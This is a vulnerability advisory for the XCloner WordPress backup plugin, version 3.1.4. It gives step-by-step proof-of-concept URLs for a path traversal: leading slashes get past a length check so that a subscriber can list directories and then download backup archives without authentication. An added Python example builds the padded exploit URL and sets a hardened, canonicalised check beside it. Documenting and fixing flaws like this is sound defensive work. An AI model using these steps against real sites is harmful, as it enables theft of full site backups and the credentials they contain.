WordPress Plugin Vulnerabilities
XCloner - Backup and Restore < 3.1.5 - Authenticated Path Traversal
Description
Authenticated users can obtain a directory listing of any location readable by the user the web server runs as, which leaks the filenames of previous backups. This was found in XCloner - Backup and Restore version 3.1.4, but may have been introduced in earlier versions. Because downloading a backup file requires no authentication once its path is known, an attacker can use the listing to learn otherwise secret backup filenames and then retrieve the full backup contents.
Proof of Concept
Log in as a regular, unprivileged user (subscriber):

1. Visit http://wordpress/wp-admin/admin-ajax.php?action=files_xml. The response is an XML file listing of the WordPress installation root, including its full filesystem path.
2. Add a `dir` GET parameter to the URL to browse a specific directory. The value is only accepted when it is longer than the plugin's `backup_path` configuration value, but the comparison is on raw string length, so it can be satisfied by prepending slashes: `/foo/bar` becomes `/////////foo/bar`, and a run of leading slashes resolves to the same directory on a POSIX filesystem (Linux collapses them). The length of `backup_path` is not known to the attacker, so add slashes by trial and error until the request succeeds. To leak previous backups, request http://wordpress/wp-admin/admin-ajax.php?action=files_xml&dir=///////var/www/html/administrator/backups
3. The listing enumerates the backup files. Their download location follows from the path revealed in the listing; depending on the previous steps it will look like http://wordpress/administrator/backups/{BACKUP_FILENAME}, and fetching it requires no authentication.
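The following is an added example, not code from the plugin or from the original advisory. It models the class of check the proof of concept implies (a raw string-length gate on the `dir` parameter), shows why prepending slashes defeats it, and places a hardened check beside it that canonicalises the path and confines it to the configured backup directory. `BACKUP_PATH`, `canonical`, `length_gated_dir`, `confined_dir`, `pad_with_slashes` and `listing_url` are names chosen here; the plugin's actual implementation is not on this page.

```python
"""Model of a length-gated directory listing and the leading-slash bypass.

Hypothetical reconstruction for illustration, not XCloner's own code.
"""
import posixpath
from urllib.parse import urlencode

# Constructed value; on a real site it is whatever the plugin's backup_path
# setting holds, which the attacker does not know in advance.
BACKUP_PATH = "/var/www/html/administrator/backups"


def canonical(path):
    """Collapse '.', '..' and repeated slashes so '///x' and '//x' both become '/x'.

    A real server should additionally use os.path.realpath so that symlinks
    below the backup directory cannot point outside it.
    """
    return "/" + posixpath.normpath(path).lstrip("/")


def length_gated_dir(requested, backup_path=BACKUP_PATH):
    """The flawed gate implied by the PoC (hypothetical): any request whose raw
    length exceeds the configured path's length is listed.

    Returns the directory that would be listed, or None when rejected.
    """
    if len(requested) <= len(backup_path):
        return None
    return canonical(requested)


def confined_dir(requested, backup_path=BACKUP_PATH):
    """Hardened gate: canonicalise both sides, then require the target to be the
    backup directory itself or something strictly below it. Length is irrelevant."""
    root = canonical(backup_path)
    target = canonical(requested)
    if target == root or target.startswith(root + "/"):
        return target
    return None


def pad_with_slashes(target, backup_path_len):
    """Step 2 of the PoC: prepend slashes until the raw length clears the gate.
    The kernel treats a run of leading slashes as one, so the path still names
    the same directory."""
    while len(target) <= backup_path_len:
        target = "/" + target
    return target


def listing_url(site, target_dir, backup_path_len):
    """Build the admin-ajax URL from the PoC for a padded directory.
    (Authentication as a subscriber is still needed when the URL is requested.)"""
    query = urlencode({"action": "files_xml",
                       "dir": pad_with_slashes(target_dir, backup_path_len)})
    return site.rstrip("/") + "/wp-admin/admin-ajax.php?" + query


if __name__ == "__main__":
    # A short path such as /etc is rejected by the length gate ...
    print(length_gated_dir("/etc"))
    # ... until it is padded; the padded path still canonicalises to /etc.
    padded = pad_with_slashes("/etc", len(BACKUP_PATH))
    print(padded, "->", length_gated_dir(padded))
    # The confined check rejects the padded path and a ../ escape alike.
    print(confined_dir(padded), confined_dir(BACKUP_PATH + "/../../etc"))
    print(listing_url("http://wordpress", BACKUP_PATH, len(BACKUP_PATH)))
```

The length gate is the only obstacle the PoC describes, and since the attacker does not know `len(BACKUP_PATH)`, padding is repeated until the listing appears. The hardened variant removes the length comparison entirely and decides on the canonical path, which is the property that actually matters; on a live server it should also resolve symlinks before the prefix comparison.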
Affects Plugins
References
Miscellaneous
Submitter
ldionmarcil
Submitter website
Submitter twitter
Verified
No
WPVDB ID
Timeline
Publicly Published
2016-12-31
Added
2017-01-03
Last Updated
2020-09-25